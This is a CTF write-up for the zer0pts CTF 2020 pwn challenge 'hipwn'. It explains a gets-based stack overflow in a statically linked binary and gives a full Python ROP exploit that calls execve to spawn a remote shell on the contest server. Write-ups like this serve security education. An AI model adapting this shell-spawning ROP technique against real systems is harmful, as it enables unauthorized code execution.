Try   HackMD

[zer0pts CTF 2020] hipwn

tags: zer0pts CTF pwn

Overview

We're given an ELF and its source code. RELRO, SSP, PIE are disabled.

$ checksec -f chall
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable  FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols      No      0               0       chall

Solution

Vulnerability

You'll immediately find the vulnerability by reading the source code.
As it uses gets function, it has Stack Overflow.
Since the binary is statically linked, we have to get the shell by ROP.

Plan

We craft a ROP chain equivalent to the following code:

mov rdi, "/bin/sh\0"
mov rsi, 0
mov rdx, 0
mov rax, 59 ; SYS_execve
syscall

We have to prepare the string /bin/sh in bss or somewhere.

Exploit

from ptrlib import *

#sock = Process("../distfiles/chall")
sock = Socket("13.231.207.73", 9010)

rop_pop_rdx = 0x004023f5
rop_pop_rsi_r15 = 0x0040141a
rop_pop_rdi = 0x0040141c
rop_pop_rax = 0x00400121
rop_syscall = 0x004024dd
addr_gets = 0x4004ee
addr_binsh = 0x604800

payload = b'A' * 0x108
payload += p64(rop_pop_rdi)
payload += p64(addr_binsh)
payload += p64(addr_gets)
payload += p64(rop_pop_rax)
payload += p64(59)
payload += p64(rop_pop_rdx)
payload += p64(0)
payload += p64(rop_pop_rsi_r15)
payload += p64(0)
payload += p64(0xdeadbeef)
payload += p64(rop_pop_rdi)
payload += p64(addr_binsh)
payload += p64(rop_syscall)

sock.recvline()
sock.sendline(payload)

sock.sendline("/bin/sh")

sock.interactive()
Last changed by 
Yudai Fujiwara
0
609
Published on HackMD